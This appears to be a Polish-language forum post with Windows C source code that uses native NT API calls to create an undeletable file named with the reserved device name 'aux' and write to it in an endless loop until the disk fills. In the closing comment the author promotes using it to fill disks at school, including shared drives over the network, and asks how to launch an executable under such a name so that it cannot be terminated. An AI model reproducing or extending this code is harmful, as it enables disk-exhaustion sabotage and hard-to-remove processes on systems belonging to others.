Kod:
#include <windows.h>
#include <stdio.h>
#include "ngl.h"
#include<io.h>
#define FILE_OPEN_IF 0x00000003
#define FILE_SYNCHRONOUS_IO_NONALERT 0x00000020
#define OBJ_KERNEL_HANDLE 0x00000200L
#define FILE_DIRECTORY_FILE 0x00000001
#define FILE_WRITE_THROUGH 0x00000002
#define FILE_SEQUENTIAL_ONLY 0x00000004
#define FILE_NO_INTERMEDIATE_BUFFERING 0x00000008
#define FILE_SYNCHRONOUS_IO_ALERT 0x00000010
#define FILE_SYNCHRONOUS_IO_NONALERT 0x00000020
#define FILE_NON_DIRECTORY_FILE 0x00000040
#define FILE_CREATE_TREE_CONNECTION 0x00000080
#define FILE_COMPLETE_IF_OPLOCKED 0x00000100
#define FILE_NO_EA_KNOWLEDGE 0x00000200
#define FILE_OPEN_FOR_RECOVERY 0x00000400
#define FILE_RANDOM_ACCESS 0x00000800
#define FILE_DELETE_ON_CLOSE 0x00001000
#define FILE_OPEN_BY_FILE_ID 0x00002000
#define FILE_OPEN_FOR_BACKUP_INTENT 0x00004000
#define FILE_NO_COMPRESSION 0x00008000
#define FILE_RESERVE_OPFILTER 0x00100000
#define FILE_OPEN_REPARSE_POINT 0x00200000
#define FILE_OPEN_NO_RECALL 0x00400000
#define FILE_OPEN_FOR_FREE_SPACE_QUERY 0x00800000
#define FILE_COPY_STRUCTURED_STORAGE 0x00000041
#define FILE_STRUCTURED_STORAGE 0x00000441
#define FILE_VALID_OPTION_FLAGS 0x00ffffff
#define FILE_VALID_PIPE_OPTION_FLAGS 0x00000032
#define FILE_VALID_MAILSLOT_OPTION_FLAGS 0x00000032
#define FILE_VALID_SET_FLAGS 0x00000036
NTSTATUS (__stdcall*ZwWriteFile)(
IN HANDLE FileHandle,
IN HANDLE Event OPTIONAL,
IN PVOID ApcRoutine OPTIONAL,
IN PVOID ApcContext OPTIONAL,
OUT PIO_STATUS_BLOCK IoStatusBlock,
IN PVOID Buffer,
IN ULONG Length,
IN PLARGE_INTEGER ByteOffset OPTIONAL,
IN PULONG Key OPTIONAL
);
NTSTATUS (__stdcall*ZwDeleteFile)(
IN POBJECT_ATTRIBUTES ObjectAttributes
);
NTSTATUS(__stdcall*ZwClose)(
IN HANDLE hd);
char a[512*700]={0xFFFFFF};
DWORD ile=0,il=0;
//
// Loads and finds the entry points we need in NTDLL.DLL
//
VOID LocateNTDLLEntryPoints()
{
if( !(ZwClose = (void *) GetProcAddress( GetModuleHandle("ntdll.dll"),
"ZwClose" )) ) {
printf("Could not find NtCreateKey entry point in NTDLL.DLLn");
exit(1);
}
if( !(ZwDeleteFile = (void *) GetProcAddress( GetModuleHandle("ntdll.dll"),
"ZwDeleteFile" )) ) {
printf("Could not find NtDeleteKey entry point in NTDLL.DLLn");
exit(1);
}
if( !(ZwWriteFile = (void *) GetProcAddress( GetModuleHandle("ntdll.dll"),
"ZwWriteFile" )) ) {
printf("Could not find NtSetValueKey entry point in NTDLL.DLLn");
exit(1);
}
if( !(ZwCreateFile = (void *) GetProcAddress( GetModuleHandle("ntdll.dll"),
"ZwCreateFile" )) ) {
printf("Could not find NtSetValueKey entry point in NTDLL.DLLn");
exit(1);
}
}
main()
{
HANDLE ph;
IO_STATUS_BLOCK iosb;
OVERLAPPED ov={0};
UNICODE_STRING KeyName;
OBJECT_ATTRIBUTES ObjectAttributes;
IO_STATUS_BLOCK *isb=(IO_STATUS_BLOCK*)malloc(6000);;;
LocateNTDLLEntryPoints();
KeyName.Buffer = L"??c:aux.cxxxap";
KeyName.Length = wcslen(L"??c:aux.cxxxap") *sizeof(WCHAR);
InitializeObjectAttributes( &ObjectAttributes, &KeyName,
OBJ_CASE_INSENSITIVE, NULL, NULL );
ZeroMemory(isb,6000);
ZwDeleteFile(&ObjectAttributes);
getchar();
ZwCreateFile(&ph,FILE_APPEND_DATA,&ObjectAttributes,&iosb,NULL,
FILE_ATTRIBUTE_NORMAL,
0,FILE_OPEN_IF ,0,
NULL,
0
);
printf("%d",GetLastError());
getchar();
//ZwWriteFile(ph,NULL,NULL,NULL,isb,a,sizeof(a),NULL,NULL);
while(1==1)
{
WriteFile(ph,a,sizeof(a),&ile,&ov);
ov.Offset+=sizeof(a);
printf("%dn",ile);
}
ZwClose(ph);
printf("%d",GetLastError());
return 0;
}
/ngl.h
Kod:
#define OBJ_CASE_INSENSITIVE 0x40
typedef DWORD ULONG;
typedef WORD USHORT;
typedef ULONG NTSTATUS;
#define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)
typedef struct _UNICODE_STRING {
USHORT Length;
USHORT MaximumLength;
PWSTR Buffer;
} UNICODE_STRING;
typedef UNICODE_STRING *PUNICODE_STRING;
typedef struct _OBJECT_ATTRIBUTES {
ULONG Length;
HANDLE RootDirectory;
PUNICODE_STRING ObjectName;
ULONG Attributes;
PVOID SecurityDescriptor; // Points to type SECURITY_DESCRIPTOR
PVOID SecurityQualityOfService; // Points to type SECURITY_QUALITY_OF_SERVICE
} OBJECT_ATTRIBUTES;
typedef OBJECT_ATTRIBUTES *POBJECT_ATTRIBUTES;
#define InitializeObjectAttributes( p, n, a, r, s ) {
(p)->Length = sizeof( OBJECT_ATTRIBUTES );
(p)->RootDirectory = r;
(p)->Attributes = a;
(p)->ObjectName = n;
(p)->SecurityDescriptor = s;
(p)->SecurityQualityOfService = NULL;
}
typedef struct _IO_STATUS_BLOCK {
union {
NTSTATUS Status;
PVOID Pointer;
};
ULONG Information;
} IO_STATUS_BLOCK, *PIO_STATUS_BLOCK;
NTSTATUS (__stdcall *NtCreateKey)(
HANDLE KeyHandle,
ULONG DesiredAccess,
POBJECT_ATTRIBUTES ObjectAttributes,
ULONG TitleIndex,
PUNICODE_STRING Class,
ULONG CreateOptions,
PULONG Disposition
);
NTSTATUS (__stdcall *NtSetValueKey)(
IN HANDLE KeyHandle,
IN PUNICODE_STRING ValueName,
IN ULONG TitleIndex, /* optional */
IN ULONG Type,
IN PVOID Data,
IN ULONG DataSize
);
NTSTATUS (__stdcall *NtDeleteKey)(
HANDLE KeyHandle
);
NTSTATUS (__stdcall*ZwCreateFile)(
OUT PHANDLE FileHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes,
OUT PIO_STATUS_BLOCK IoStatusBlock,
IN PLARGE_INTEGER AllocationSize OPTIONAL,
IN ULONG FileAttributes,
IN ULONG ShareAccess,
IN ULONG CreateDisposition,
IN ULONG CreateOptions,
IN PVOID EaBuffer OPTIONAL,
IN ULONG EaLength
);
NTSTATUS(__stdcall* ZwCreateDirectoryObject)(
OUT PHANDLE DirectoryHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes
);
//ok on za kazdym razem tworzy na dysku nowy plik o nazwie aux.cxxxap jak wiecie takiego pliku normalnym sposobem nie da rady utworzyć, ten plik może utworzyć w systemie nawet user bez żadnych praw, więc może sie komuś to przydać w szkole naprzykład do zapychania dysków, jak se zrobi jesczze przez sieć to też do zapychania w lanie w szkole jak ma udostepnione, super co nie ?
a teraz pytanko, czy jakbym do takiego pliku skopiował zawartość jakiegooś exe-ka naprzykład notepada, (po protsu notepad.exe tylko pod nazwą AUX.NOTEPAD.EXE ) to jak by taki plik można było uruchomić ? ZwCreateProcess ? tylko jak dalej ? to troche skomplikowane ale takiego procesu też by chyba nie można było zakończyć ze względu na nazwe aux..... może ktoś pomoże ?